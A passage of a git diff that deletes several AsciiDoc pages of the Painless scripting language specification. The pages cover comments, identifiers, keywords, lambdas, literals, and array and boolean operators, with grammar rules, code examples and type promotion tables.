| A | - | - | - | - | - | - | - | | @ | I -| Reference ( R ) | I | @ | @ | - | - | - | - | - | - | - | - | @ | @ | @ | @ | @ | @ | @ | 
@ | @ | I -|==== - -*`def` Type* - -[cols="<3,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1"] -|==== -| | O | N | T | b | y | s | c | i | j | f | d | B | Y | S | C | I | J | F | D | R -| def as String | I | - | I | - | - | - | E | - | - | - | - | - | - | - | E | - | - | - | - | @ -| def as boolean/Boolean | I | - | - | I | - | - | - | - | - | - | - | I | - | - | - | - | - | - | - | @ -| def as byte/Byte | I | - | - | - | I | I | E | I | I | I | I | - | I | I | E | I | I | I | I | @ -| def as short/Short | I | - | - | - | E | I | E | I | I | I | I | - | E | I | E | I | I | I | I | @ -| def as char/Character | I | - | - | - | E | E | I | I | I | I | I | - | E | E | I | I | I | I | I | @ -| def as int/Integer | I | - | - | - | E | E | E | I | I | I | I | - | E | E | E | I | I | I | I | @ -| def as long/Long | I | - | - | - | E | E | E | E | I | I | I | - | E | E | E | E | I | I | I | @ -| def as float/Float | I | - | - | - | E | E | E | E | E | I | I | - | E | E | E | E | E | I | I | @ -| def as double/Double | I | - | - | - | E | E | E | E | E | E | I | - | E | E | E | E | E | E | I | @ -| def as Reference | @ | @ | @ | - | - | - | - | - | - | - | - | @ | @ | @ | @ | @ | @ | @ | @ | @ -|==== diff --git a/docs/painless/painless-lang-spec/painless-comments.asciidoc b/docs/painless/painless-lang-spec/painless-comments.asciidoc deleted file mode 100644 index bfd3594431e..00000000000 --- a/docs/painless/painless-lang-spec/painless-comments.asciidoc +++ /dev/null @@ -1,52 +0,0 @@ -[[painless-comments]] -=== Comments - -Use a comment to annotate or explain code within a script. Use the `//` token -anywhere on a line to specify a single-line comment. All characters from the -`//` token to the end of the line are ignored. Use an opening `/*` token and a -closing `*/` token to specify a multi-line comment. Multi-line comments can -start anywhere on a line, and all characters in between the `/*` token and `*/` -token are ignored. A comment is included anywhere within a script. - -*Grammar* - -[source,ANTLR4] ----- -SINGLE_LINE_COMMENT: '//' .*? [\n\r]; -MULTI_LINE_COMMENT: '/*' .*? '*/'; ----- - -*Examples* - -* Single-line comments. -+ -[source,Painless] ----- -// single-line comment - -int value; // single-line comment ----- -+ -* Multi-line comments. -+ -[source,Painless] ----- -/* multi- - line - comment */ - -int value; /* multi- - line - comment */ value = 0; - -int value; /* multi-line - comment */ - -/* multi-line - comment */ int value; - -int value; /* multi-line - comment */ value = 0; - -int value; /* multi-line comment */ value = 0; ----- diff --git a/docs/painless/painless-lang-spec/painless-functions.asciidoc b/docs/painless/painless-lang-spec/painless-functions.asciidoc deleted file mode 100644 index 20f3e821f1e..00000000000 --- a/docs/painless/painless-lang-spec/painless-functions.asciidoc +++ /dev/null @@ -1,24 +0,0 @@ -[[painless-functions]] -=== Functions - -A function is a named piece of code comprised of one-to-many statements to -perform a specific task. A function is called multiple times in a single script -to repeat its specific task. A parameter is a named type value available as a -<> within the statement(s) of a function. A -function specifies zero-to-many parameters, and when a function is called a -value is specified per parameter. An argument is a value passed into a function -at the point of call. A function specifies a return type value, though if the -type is <> then no value is returned. 
Any non-void type return -value is available for use within an <> or is -discarded otherwise. - -You can declare functions at the beginning of a Painless script, for example: - -[source,painless] ---------------------------------------------------------- -boolean isNegative(def x) { x < 0 } -... -if (isNegative(someVar)) { - ... -} ---------------------------------------------------------- \ No newline at end of file diff --git a/docs/painless/painless-lang-spec/painless-identifiers.asciidoc b/docs/painless/painless-lang-spec/painless-identifiers.asciidoc deleted file mode 100644 index d2678b528ea..00000000000 --- a/docs/painless/painless-lang-spec/painless-identifiers.asciidoc +++ /dev/null @@ -1,33 +0,0 @@ -[[painless-identifiers]] -=== Identifiers - -Use an identifier as a named token to specify a -<>, <>, -<>, <>, or -<>. - -*Errors* - -If a <> is used as an identifier. - -*Grammar* -[source,ANTLR4] ----- -ID: [_a-zA-Z] [_a-zA-Z-0-9]*; ----- - -*Examples* - -* Variations of identifiers. -+ -[source,Painless] ----- -a -Z -id -list -list0 -MAP25 -_map25 -Map_25 ----- diff --git a/docs/painless/painless-lang-spec/painless-keywords.asciidoc b/docs/painless/painless-lang-spec/painless-keywords.asciidoc deleted file mode 100644 index 24371d3713c..00000000000 --- a/docs/painless/painless-lang-spec/painless-keywords.asciidoc +++ /dev/null @@ -1,17 +0,0 @@ -[[painless-keywords]] -=== Keywords - -Keywords are reserved tokens for built-in language features. - -*Errors* - -* If a keyword is used as an <>. - -*Keywords* - -[cols="^1,^1,^1,^1,^1"] -|==== -| if | else | while | do | for -| in | continue | break | return | new -| try | catch | throw | this | instanceof -|==== diff --git a/docs/painless/painless-lang-spec/painless-lambdas.asciidoc b/docs/painless/painless-lang-spec/painless-lambdas.asciidoc deleted file mode 100644 index e6694229a0c..00000000000 --- a/docs/painless/painless-lang-spec/painless-lambdas.asciidoc +++ /dev/null @@ -1,15 +0,0 @@ -[[painless-lambdas]] -=== Lambdas -Lambda expressions and method references work the same as in https://docs.oracle.com/javase/tutorial/java/javaOO/lambdaexpressions.html[Java]. - -[source,painless] ---------------------------------------------------------- -list.removeIf(item -> item == 2); -list.removeIf((int item) -> item == 2); -list.removeIf((int item) -> { item == 2 }); -list.sort((x, y) -> x - y); -list.sort(Integer::compare); ---------------------------------------------------------- - -You can make method references to functions within the script with `this`, -for example `list.sort(this::mycompare)`. \ No newline at end of file diff --git a/docs/painless/painless-lang-spec/painless-literals.asciidoc b/docs/painless/painless-lang-spec/painless-literals.asciidoc deleted file mode 100644 index f2e58496380..00000000000 --- a/docs/painless/painless-lang-spec/painless-literals.asciidoc +++ /dev/null @@ -1,125 +0,0 @@ -[[painless-literals]] -=== Literals - -Use a literal to specify a value directly in an -<>. - -[[integer-literals]] -==== Integers - -Use an integer literal to specify an integer type value in decimal, octal, or -hex notation of a <> `int`, `long`, `float`, -or `double`. Use the following single letter designations to specify the -primitive type: `l` or `L` for `long`, `f` or `F` for `float`, and `d` or `D` -for `double`. If not specified, the type defaults to `int`. Use `0` as a prefix -to specify an integer literal as octal, and use `0x` or `0X` as a prefix to -specify an integer literal as hex. 
- -*Grammar* - -[source,ANTLR4] ----- -INTEGER: '-'? ( '0' | [1-9] [0-9]* ) [lLfFdD]?; -OCTAL: '-'? '0' [0-7]+ [lL]?; -HEX: '-'? '0' [xX] [0-9a-fA-F]+ [lL]?; ----- - -*Examples* - -* Integer literals. -+ -[source,Painless] ----- -0 <1> -0D <2> -1234L <3> --90f <4> --022 <5> -0xF2A <6> ----- -+ -<1> `int 0` -<2> `double 0.0` -<3> `long 1234` -<4> `float -90.0` -<5> `int -18` in octal -<6> `int 3882` in hex - -[[float-literals]] -==== Floats - -Use a floating point literal to specify a floating point type value of a -<> `float` or `double`. Use the following -single letter designations to specify the primitive type: `f` or `F` for `float` -and `d` or `D` for `double`. If not specified, the type defaults to `double`. - -*Grammar* - -[source,ANTLR4] ----- -DECIMAL: '-'? ( '0' | [1-9] [0-9]* ) (DOT [0-9]+)? EXPONENT? [fFdD]?; -EXPONENT: ( [eE] [+\-]? [0-9]+ ); ----- - -*Examples* - -* Floating point literals. -+ -[source,Painless] ----- -0.0 <1> -1E6 <2> -0.977777 <3> --126.34 <4> -89.9F <5> ----- -+ -<1> `double 0.0` -<2> `double 1000000.0` in exponent notation -<3> `double 0.977777` -<4> `double -126.34` -<5> `float 89.9` - -[[string-literals]] -==== Strings - -Use a string literal to specify a <> value with -either single-quotes or double-quotes. Use a `\"` token to include a -double-quote as part of a double-quoted string literal. Use a `\'` token to -include a single-quote as part of a single-quoted string literal. Use a `\\` -token to include a backslash as part of any string literal. - -*Grammar* - -[source,ANTLR4] ----- -STRING: ( '"' ( '\\"' | '\\\\' | ~[\\"] )*? '"' ) - | ( '\'' ( '\\\'' | '\\\\' | ~[\\'] )*? '\'' ); ----- - -*Examples* - -* String literals using single-quotes. -+ -[source,Painless] ----- -'single-quoted string literal' -'\'single-quoted with escaped single-quotes\' and backslash \\' -'single-quoted with non-escaped "double-quotes"' ----- -+ -* String literals using double-quotes. -+ -[source,Painless] ----- -"double-quoted string literal" -"\"double-quoted with escaped double-quotes\" and backslash: \\" -"double-quoted with non-escaped 'single-quotes'" ----- - -[[character-literals]] -==== Characters - -Character literals are not specified directly. Instead, use the -<> to convert a `String` type value -into a `char` type value. diff --git a/docs/painless/painless-lang-spec/painless-operators-array.asciidoc b/docs/painless/painless-lang-spec/painless-operators-array.asciidoc deleted file mode 100644 index ad23a980cb4..00000000000 --- a/docs/painless/painless-lang-spec/painless-operators-array.asciidoc +++ /dev/null @@ -1,294 +0,0 @@ -[[painless-operators-array]] -=== Operators: Array - -[[array-initialization-operator]] -==== Array Initialization - -Use the `array initialization operator '[] {}'` to allocate a single-dimensional -<> instance to the heap with a set of pre-defined -elements. Each value used to initialize an element in the array type instance is -cast to the specified element type value upon insertion. The order of specified -values is maintained. - -*Errors* - -* If a value is not castable to the specified type value. - -*Grammar* - -[source,ANTLR4] ----- -array_initialization: 'new' TYPE '[' ']' '{' expression_list '}' - | 'new' TYPE '[' ']' '{' '}'; -expression_list: expression (',' expression); ----- - -*Example:* - -* Array initialization with static values. 
-+ -[source,Painless] ----- -int[] x = new int[] {1, 2, 3}; <1> ----- -+ -<1> declare `int[] x`; - allocate `1-d int array` instance with `length [3]` - -> `1-d int array reference`; - store `int 1` to `index [0]` of `1-d int array reference`; - store `int 2` to `index [1]` of `1-d int array reference`; - store `int 3` to `index [2]` of `1-d int array reference`; - store `1-d int array reference` to `x`; -+ -* Array initialization with non-static values. -+ -[source,Painless] ----- -int i = 1; <1> -long l = 2L; <2> -float f = 3.0F; <3> -double d = 4.0; <4> -String s = "5"; <5> -def array = new def[] {i, l, f*d, s}; <6> ----- -+ -<1> declare `int i`; - store `int 1` to `i` -<2> declare `long l`; - store `long 2` to `l` -<3> declare `float f`; - store `float 3.0` to `f` -<4> declare `double d`; - store `double 4.0` to `d` -<5> declare `String s`; - store `String "5"` to `s` -<6> declare `def array`; - allocate `1-d def array` instance with `length [4]` - -> `1-d def array reference`; - load from `i` -> `int 1`; - implicit cast `int 1` to `def` -> `def`; - store `def` to `index [0]` of `1-d def array reference`; - load from `l` -> `long 2`; - implicit cast `long 2` to `def` -> `def`; - store `def` to `index [1]` of `1-d def array reference`; - load from `f` -> `float 3.0`; - load from `d` -> `double 4.0`; - promote `float 3.0` and `double 4.0`: result `double`; - implicit cast `float 3.0` to `double 3.0` -> `double 3.0`; - multiply `double 3.0` and `double 4.0` -> `double 12.0`; - implicit cast `double 12.0` to `def` -> `def`; - store `def` to `index [2]` of `1-d def array reference`; - load from `s` -> `String "5"`; - implicit cast `String "5"` to `def` -> `def`; - store `def` to `index [3]` of `1-d def array reference`; - implicit cast `1-d int array reference` to `def` -> `def`; - store `def` to `array` - -[[array-access-operator]] -==== Array Access - -Use the `array access operator '[]'` to store a value to or load a value from -an <> value. Each element of an array type value is -accessed with an `int` type value to specify the index to store/load. The range -of elements within an array that are accessible is `[0, size)` where size is the -number of elements specified at the time of allocation. Use a negative `int` -type value as an index to access an element in reverse from the end of an array -type value within a range of `[-size, -1]`. - -*Errors* - -* If a value other than an `int` type value or a value that is castable to an - `int` type value is provided as an index. -* If an element is accessed outside of the valid ranges. - -*Grammar* - -[source,ANTLR4] ----- -brace_access: '[' expression ']' ----- - -*Examples* - -* Array access with a single-dimensional array. 
-+ -[source,Painless] ----- -int[] x = new int[2]; <1> -x[0] = 2; <2> -x[1] = 5; <3> -int y = x[0] + x[1]; <4> -int z = 1; <5> -int i = x[z]; <6> ----- -+ -<1> declare `int[] x`; - allocate `1-d int array` instance with `length [2]` - -> `1-d int array reference`; - store `1-d int array reference` to `x` -<2> load from `x` -> `1-d int array reference`; - store `int 2` to `index [0]` of `1-d int array reference`; -<3> load from `x` -> `1-d int array reference`; - store `int 5` to `index [1]` of `1-d int array reference`; -<4> declare `int y`; - load from `x` -> `1-d int array reference`; - load from `index [0]` of `1-d int array reference` -> `int 2`; - load from `x` -> `1-d int array reference`; - load from `index [1]` of `1-d int array reference` -> `int 5`; - add `int 2` and `int 5` -> `int 7`; - store `int 7` to `y` -<5> declare `int z`; - store `int 1` to `z`; -<6> declare `int i`; - load from `x` -> `1-d int array reference`; - load from `z` -> `int 1`; - load from `index [1]` of `1-d int array reference` -> `int 5`; - store `int 5` to `i`; -+ -* Array access with the `def` type. -+ -[source,Painless] ----- -def d = new int[2]; <1> -d[0] = 2; <2> -d[1] = 5; <3> -def x = d[0] + d[1]; <4> -def y = 1; <5> -def z = d[y]; <6> ----- -+ -<1> declare `def d`; - allocate `1-d int array` instance with `length [2]` - -> `1-d int array reference`; - implicit cast `1-d int array reference` to `def` -> `def`; - store `def` to `d` -<2> load from `d` -> `def` - implicit cast `def` to `1-d int array reference` - -> `1-d int array reference`; - store `int 2` to `index [0]` of `1-d int array reference`; -<3> load from `d` -> `def` - implicit cast `def` to `1-d int array reference` - -> `1-d int array reference`; - store `int 5` to `index [1]` of `1-d int array reference`; -<4> declare `int x`; - load from `d` -> `def` - implicit cast `def` to `1-d int array reference` - -> `1-d int array reference`; - load from `index [0]` of `1-d int array reference` -> `int 2`; - load from `d` -> `def` - implicit cast `def` to `1-d int array reference` - -> `1-d int array reference`; - load from `index [1]` of `1-d int array reference` -> `int 5`; - add `int 2` and `int 5` -> `int 7`; - implicit cast `int 7` to `def` -> `def`; - store `def` to `x` -<5> declare `def y`; - implicit cast `int 1` to `def` -> `def`; - store `def` to `y`; -<6> declare `int i`; - load from `d` -> `def` - implicit cast `def` to `1-d int array reference` - -> `1-d int array reference`; - load from `y` -> `def`; - implicit cast `def` to `int 1` -> `int 1`; - load from `index [1]` of `1-d int array reference` -> `int 5`; - implicit cast `int 5` to `def`; - store `def` to `z`; -+ -* Array access with a multi-dimensional array. -+ -[source,Painless] ----- -int[][][] ia3 = new int[2][3][4]; <1> -ia3[1][2][3] = 99; <2> -int i = ia3[1][2][3]; <3> ----- -+ -<1> declare `int[][][] ia`; - allocate `3-d int array` instance with length `[2, 3, 4]` - -> `3-d int array reference`; - store `3-d int array reference` to `ia3` -<2> load from `ia3` -> `3-d int array reference`; - store `int 99` to `index [1, 2, 3]` of `3-d int array reference` -<3> declare `int i`; - load from `ia3` -> `3-d int array reference`; - load from `index [1, 2, 3]` of `3-d int array reference` -> `int 99`; - store `int 99` to `i` - -[[array-length-operator]] -==== Array Length - -An array type value contains a read-only member field named `length`. 
The -`length` field stores the size of the array as an `int` type value where size is -the number of elements specified at the time of allocation. Use the -<> to load the field `length` -from an array type value. - -*Examples* - -* Access the `length` field. -+ -[source,Painless] ----- -int[] x = new int[10]; <1> -int l = x.length; <2> ----- -<1> declare `int[] x`; - allocate `1-d int array` instance with `length [2]` - -> `1-d int array reference`; - store `1-d int array reference` to `x` -<2> declare `int l`; - load `x` -> `1-d int array reference`; - load `length` from `1-d int array reference` -> `int 10`; - store `int 10` to `l`; - -[[new-array-operator]] -==== New Array - -Use the `new array operator 'new []'` to allocate an array type instance to -the heap. Specify the element type following the `new` token. Specify each -dimension with the `[` and `]` tokens following the element type name. The size -of each dimension is specified by an `int` type value in between each set of `[` -and `]` tokens. - -*Errors* - -* If a value other than an `int` type value or a value that is castable to an - `int` type value is specified for a dimension's size. - -*Grammar* - -[source,ANTLR4] ----- -new_array: 'new' TYPE ('[' expression ']')+; ----- - -*Examples* - -* Allocation of different array types. -+ -[source,Painless] ----- -int[] x = new int[5]; <1> -x = new int[10]; <2> -int y = 2; <3> -def z = new def[y][y*2]; <4> ----- -+ -<1> declare `int[] x`; - allocate `1-d int array` instance with `length [5]` - -> `1-d int array reference`; - store `1-d int array reference` to `x` -<2> allocate `1-d int array` instance with `length [10]` - -> `1-d int array reference`; - store `1-d int array reference` to `x` -<3> declare `int y`; - store `int 2` to `y`; -<4> declare `def z`; - load from `y` -> `int 2 @0`; - load from `y` -> `int 2 @1`; - multiply `int 2 @1` by `int 2 @2` -> `int 4`; - allocate `2-d int array` instance with length `[2, 4]` - -> `2-d int array reference`; - implicit cast `2-d int array reference` to `def` -> `def`; - store `def` to `z`; diff --git a/docs/painless/painless-lang-spec/painless-operators-boolean.asciidoc b/docs/painless/painless-lang-spec/painless-operators-boolean.asciidoc deleted file mode 100644 index 6f9481aa4ec..00000000000 --- a/docs/painless/painless-lang-spec/painless-operators-boolean.asciidoc +++ /dev/null @@ -1,1420 +0,0 @@ -[[painless-operators-boolean]] -=== Operators: Boolean - -[[boolean-not-operator]] -==== Boolean Not - -Use the `boolean not operator '!'` to NOT a `boolean` type value where `true` is -flipped to `false` and `false` is flipped to `true`. - -*Errors* - -* If a value other than a `boolean` type value or a value that is castable to a - `boolean` type value is given. - -*Truth* - -[options="header",cols="<1,<1"] -|==== -| original | result -| true | false -| false | true -|==== - -*Grammar* - -[source,ANTLR4] ----- -boolean_not: '!' expression; ----- - -*Examples* - -* Boolean not with the `boolean` type. -+ -[source,Painless] ----- -boolean x = !false; <1> -boolean y = !x; <2> ----- -<1> declare `boolean x`; - boolean not `boolean false` -> `boolean true`; - store `boolean true` to `x` -<2> declare `boolean y`; - load from `x` -> `boolean true`; - boolean not `boolean true` -> `boolean false`; - store `boolean false` to `y` -+ -* Boolean not with the `def` type. 
-+ -[source,Painless] ----- -def y = true; <1> -def z = !y; <2> ----- -+ -<1> declare `def y`; - implicit cast `boolean true` to `def` -> `def`; - store `true` to `y` -<2> declare `def z`; - load from `y` -> `def`; - implicit cast `def` to `boolean true` -> boolean `true`; - boolean not `boolean true` -> `boolean false`; - implicit cast `boolean false` to `def` -> `def`; - store `def` to `z` - -[[greater-than-operator]] -==== Greater Than - -Use the `greater than operator '>'` to COMPARE two numeric type values where a -resultant `boolean` type value is `true` if the left-hand side value is greater -than to the right-hand side value and `false` otherwise. - -*Errors* - -* If either the evaluated left-hand side or the evaluated right-hand side is a - non-numeric value. - -*Grammar* - -[source,ANTLR4] ----- -greater_than: expression '>' expression; ----- - -*Promotion* - -[cols="<1,^1,^1,^1,^1,^1,^1,^1,^1"] -|==== -| | byte | short | char | int | long | float | double | def -| byte | int | int | int | int | long | float | double | def -| short | int | int | int | int | long | float | double | def -| char | int | int | int | int | long | float | double | def -| int | int | int | int | int | long | float | double | def -| long | long | long | long | long | long | float | double | def -| float | float | float | float | float | float | float | double | def -| double | double | double | double | double | double | double | double | def -| def | def | def | def | def | def | def | def | def -|==== - -*Examples* - -* Greater than with different numeric types. -+ -[source,Painless] ----- -boolean x = 5 > 4; <1> -double y = 6.0; <2> -x = 6 > y; <3> ----- -+ -<1> declare `boolean x`; - greater than `int 5` and `int 4` -> `boolean true`; - store `boolean true` to `x`; -<2> declare `double y`; - store `double 6.0` to `y`; -<3> load from `y` -> `double 6.0 @0`; - promote `int 6` and `double 6.0`: result `double`; - implicit cast `int 6` to `double 6.0 @1` -> `double 6.0 @1`; - greater than `double 6.0 @1` and `double 6.0 @0` -> `boolean false`; - store `boolean false` to `x` -+ -* Greater than with `def` type. -+ -[source,Painless] ----- -int x = 5; <1> -def y = 7.0; <2> -def z = y > 6.5; <3> -def a = x > y; <4> ----- -+ -<1> declare `int x`; - store `int 5` to `x` -<2> declare `def y`; - implicit cast `double 7.0` to `def` -> `def`; - store `def` to `y` -<3> declare `def z`; - load from `y` -> `def`; - implicit cast `def` to `double 7.0` -> `double 7.0`; - greater than `double 7.0` and `double 6.5` -> `boolean true`; - implicit cast `boolean true` to `def` -> `def`; - store `def` to `z` -<4> declare `def a`; - load from `y` -> `def`; - implicit cast `def` to `double 7.0` -> `double 7.0`; - load from `x` -> `int 5`; - promote `int 5` and `double 7.0`: result `double`; - implicit cast `int 5` to `double 5.0` -> `double 5.0`; - greater than `double 5.0` and `double 7.0` -> `boolean false`; - implicit cast `boolean false` to `def` -> `def`; - store `def` to `z` - -[[greater-than-or-equal-operator]] -==== Greater Than Or Equal - -Use the `greater than or equal operator '>='` to COMPARE two numeric type values -where a resultant `boolean` type value is `true` if the left-hand side value is -greater than or equal to the right-hand side value and `false` otherwise. - -*Errors* - -* If either the evaluated left-hand side or the evaluated right-hand side is a - non-numeric value. 
- -*Grammar* - -[source,ANTLR4] ----- -greater_than_or_equal: expression '>=' expression; ----- - -*Promotion* - -[cols="<1,^1,^1,^1,^1,^1,^1,^1,^1"] -|==== -| | byte | short | char | int | long | float | double | def -| byte | int | int | int | int | long | float | double | def -| short | int | int | int | int | long | float | double | def -| char | int | int | int | int | long | float | double | def -| int | int | int | int | int | long | float | double | def -| long | long | long | long | long | long | float | double | def -| float | float | float | float | float | float | float | double | def -| double | double | double | double | double | double | double | double | def -| def | def | def | def | def | def | def | def | def -|==== - -*Examples* - -* Greater than or equal with different numeric types. -+ -[source,Painless] ----- -boolean x = 5 >= 4; <1> -double y = 6.0; <2> -x = 6 >= y; <3> ----- -+ -<1> declare `boolean x`; - greater than or equal `int 5` and `int 4` -> `boolean true`; - store `boolean true` to `x` -<2> declare `double y`; - store `double 6.0` to `y` -<3> load from `y` -> `double 6.0 @0`; - promote `int 6` and `double 6.0`: result `double`; - implicit cast `int 6` to `double 6.0 @1` -> `double 6.0 @1`; - greater than or equal `double 6.0 @1` and `double 6.0 @0` -> `boolean true`; - store `boolean true` to `x` -+ -* Greater than or equal with the `def` type. -+ -[source,Painless] ----- -int x = 5; <1> -def y = 7.0; <2> -def z = y >= 7.0; <3> -def a = x >= y; <4> ----- -+ -<1> declare `int x`; - store `int 5` to `x`; -<2> declare `def y` - implicit cast `double 7.0` to `def` -> `def`; - store `def` to `y` -<3> declare `def z`; - load from `y` -> `def`; - implicit cast `def` to `double 7.0 @0` -> `double 7.0 @0`; - greater than or equal `double 7.0 @0` and `double 7.0 @1` -> `boolean true`; - implicit cast `boolean true` to `def` -> `def`; - store `def` to `z` -<4> declare `def a`; - load from `y` -> `def`; - implicit cast `def` to `double 7.0` -> `double 7.0`; - load from `x` -> `int 5`; - promote `int 5` and `double 7.0`: result `double`; - implicit cast `int 5` to `double 5.0` -> `double 5.0`; - greater than or equal `double 5.0` and `double 7.0` -> `boolean false`; - implicit cast `boolean false` to `def` -> `def`; - store `def` to `z` - -[[less-than-operator]] -==== Less Than - -Use the `less than operator '<'` to COMPARE two numeric type values where a -resultant `boolean` type value is `true` if the left-hand side value is less -than to the right-hand side value and `false` otherwise. - -*Errors* - -* If either the evaluated left-hand side or the evaluated right-hand side is a - non-numeric value. - -*Grammar* - -[source,ANTLR4] ----- -less_than: expression '<' expression; ----- - -*Promotion* - -[cols="<1,^1,^1,^1,^1,^1,^1,^1,^1"] -|==== -| | byte | short | char | int | long | float | double | def -| byte | int | int | int | int | long | float | double | def -| short | int | int | int | int | long | float | double | def -| char | int | int | int | int | long | float | double | def -| int | int | int | int | int | long | float | double | def -| long | long | long | long | long | long | float | double | def -| float | float | float | float | float | float | float | double | def -| double | double | double | double | double | double | double | double | def -| def | def | def | def | def | def | def | def | def -|==== - -*Examples* - -* Less than with different numeric types. 
-+ -[source,Painless] ----- -boolean x = 5 < 4; <1> -double y = 6.0; <2> -x = 6 < y; <3> ----- -+ -<1> declare `boolean x`; - less than `int 5` and `int 4` -> `boolean false`; - store `boolean false` to `x` -<2> declare `double y`; - store `double 6.0` to `y` -<3> load from `y` -> `double 6.0 @0`; - promote `int 6` and `double 6.0`: result `double`; - implicit cast `int 6` to `double 6.0 @1` -> `double 6.0 @1`; - less than `double 6.0 @1` and `double 6.0 @0` -> `boolean false`; - store `boolean false` to `x` -+ -* Less than with the `def` type. -+ -[source,Painless] ----- -int x = 5; <1> -def y = 7.0; <2> -def z = y < 6.5; <3> -def a = x < y; <4> ----- -+ -<1> declare `int x`; - store `int 5` to `x` -<2> declare `def y`; - implicit cast `double 7.0` to `def` -> `def`; - store `def` to `y` -<3> declare `def z`; - load from `y` -> `def`; - implicit cast `def` to `double 7.0` -> `double 7.0`; - less than `double 7.0` and `double 6.5` -> `boolean false`; - implicit cast `boolean false` to `def` -> `def`; - store `def` to `z` -<4> declare `def a`; - load from `y` -> `def`; - implicit cast `def` to `double 7.0` -> `double 7.0`; - load from `x` -> `int 5`; - promote `int 5` and `double 7.0`: result `double`; - implicit cast `int 5` to `double 5.0` -> `double 5.0`; - less than `double 5.0` and `double 7.0` -> `boolean true`; - implicit cast `boolean true` to `def` -> `def`; - store `def` to `z` - -[[less-than-or-equal-operator]] -==== Less Than Or Equal - -Use the `less than or equal operator '<='` to COMPARE two numeric type values -where a resultant `boolean` type value is `true` if the left-hand side value is -less than or equal to the right-hand side value and `false` otherwise. - -*Errors* - -* If either the evaluated left-hand side or the evaluated right-hand side is a - non-numeric value. - -*Grammar* - -[source,ANTLR4] ----- -greater_than_or_equal: expression '<=' expression; ----- - -*Promotion* - -[cols="<1,^1,^1,^1,^1,^1,^1,^1,^1"] -|==== -| | byte | short | char | int | long | float | double | def -| byte | int | int | int | int | long | float | double | def -| short | int | int | int | int | long | float | double | def -| char | int | int | int | int | long | float | double | def -| int | int | int | int | int | long | float | double | def -| long | long | long | long | long | long | float | double | def -| float | float | float | float | float | float | float | double | def -| double | double | double | double | double | double | double | double | def -| def | def | def | def | def | def | def | def | def -|==== - -*Examples* - -* Less than or equal with different numeric types. -+ -[source,Painless] ----- -boolean x = 5 <= 4; <1> -double y = 6.0; <2> -x = 6 <= y; <3> ----- -+ -<1> declare `boolean x`; - less than or equal `int 5` and `int 4` -> `boolean false`; - store `boolean true` to `x` -<2> declare `double y`; - store `double 6.0` to `y` -<3> load from `y` -> `double 6.0 @0`; - promote `int 6` and `double 6.0`: result `double`; - implicit cast `int 6` to `double 6.0 @1` -> `double 6.0 @1`; - less than or equal `double 6.0 @1` and `double 6.0 @0` -> `boolean true`; - store `boolean true` to `x` -+ -* Less than or equal with the `def` type. 
-+ -[source,Painless] ----- -int x = 5; <1> -def y = 7.0; <2> -def z = y <= 7.0; <3> -def a = x <= y; <4> ----- -+ -<1> declare `int x`; - store `int 5` to `x`; -<2> declare `def y`; - implicit cast `double 7.0` to `def` -> `def`; - store `def` to `y`; -<3> declare `def z`; - load from `y` -> `def`; - implicit cast `def` to `double 7.0 @0` -> `double 7.0 @0`; - less than or equal `double 7.0 @0` and `double 7.0 @1` -> `boolean true`; - implicit cast `boolean true` to `def` -> `def`; - store `def` to `z` -<4> declare `def a`; - load from `y` -> `def`; - implicit cast `def` to `double 7.0` -> `double 7.0`; - load from `x` -> `int 5`; - promote `int 5` and `double 7.0`: result `double`; - implicit cast `int 5` to `double 5.0` -> `double 5.0`; - less than or equal `double 5.0` and `double 7.0` -> `boolean true`; - implicit cast `boolean true` to `def` -> `def`; - store `def` to `z` - -[[instanceof-operator]] -==== Instanceof - -Use the `instanceof operator` to COMPARE the variable/field type to a -specified reference type using the reference type name where a resultant -`boolean` type value is `true` if the variable/field type is the same as or a -descendant of the specified reference type and false otherwise. - -*Errors* - -* If the reference type name doesn't exist as specified by the right-hand side. - -*Grammar* - -[source,ANTLR4] ----- -instance_of: ID 'instanceof' TYPE; ----- - -*Examples* - -* Instance of with different reference types. -+ -[source,Painless] ----- -Map m = new HashMap(); <1> -boolean a = m instanceof HashMap; <2> -boolean b = m instanceof Map; <3> ----- -+ -<1> declare `Map m`; - allocate `HashMap` instance -> `HashMap reference`; - implicit cast `HashMap reference` to `Map reference`; - store `Map reference` to `m` -<2> declare `boolean a`; - load from `m` -> `Map reference`; - implicit cast `Map reference` to `HashMap reference` -> `HashMap reference`; - instanceof `HashMap reference` and `HashMap` -> `boolean true`; - store `boolean true` to `a` -<3> declare `boolean b`; - load from `m` -> `Map reference`; - implicit cast `Map reference` to `HashMap reference` -> `HashMap reference`; - instanceof `HashMap reference` and `Map` -> `boolean true`; - store `true` to `b`; - (note `HashMap` is a descendant of `Map`) -+ -* Instance of with the `def` type. -+ -[source,Painless] ----- -def d = new ArrayList(); <1> -boolean a = d instanceof List; <2> -boolean b = d instanceof Map; <3> ----- -+ -<1> declare `def d`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `def` -> `def`; - store `def` to `d` -<2> declare `boolean a`; - load from `d` -> `def`; - implicit cast `def` to `ArrayList reference` -> `ArrayList reference`; - instanceof `ArrayList reference` and `List` -> `boolean true`; - store `boolean true` to `a`; - (note `ArrayList` is a descendant of `List`) -<3> declare `boolean b`; - load from `d` -> `def`; - implicit cast `def` to `ArrayList reference` -> `ArrayList reference`; - instanceof `ArrayList reference` and `Map` -> `boolean false`; - store `boolean false` to `a`; - (note `ArrayList` is not a descendant of `Map`) - -[[equality-equals-operator]] -==== Equality Equals - -Use the `equality equals operator '=='` to COMPARE two values where a resultant -`boolean` type value is `true` if the two values are equal and `false` -otherwise. The member method, `equals`, is implicitly called when the values are -reference type values where the first value is the target of the call and the -second value is the argument. 
This operation is null-safe where if both values -are `null` the resultant `boolean` type value is `true`, and if only one value -is `null` the resultant `boolean` type value is `false`. A valid comparison is -between `boolean` type values, numeric type values, or reference type values. - -*Errors* - -* If a comparison is made between a `boolean` type value and numeric type value. -* If a comparison is made between a primitive type value and a reference type - value. - -*Grammar* - -[source,ANTLR4] ----- -equality_equals: expression '==' expression; ----- - -*Promotion* - -[cols="<1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1"] -|==== -| | boolean | byte | short | char | int | long | float | double | Reference | def -| boolean | boolean | - | - | - | - | - | - | - | - | def -| byte | - | int | int | int | int | long | float | double | - | def -| short | - | int | int | int | int | long | float | double | - | def -| char | - | int | int | int | int | long | float | double | - | def -| int | - | int | int | int | int | long | float | double | - | def -| long | - | long | long | long | long | long | float | double | - | def -| float | - | float | float | float | float | float | float | double | - | def -| double | - | double | double | double | double | double | double | double | - | def -| Reference | - | - | - | - | 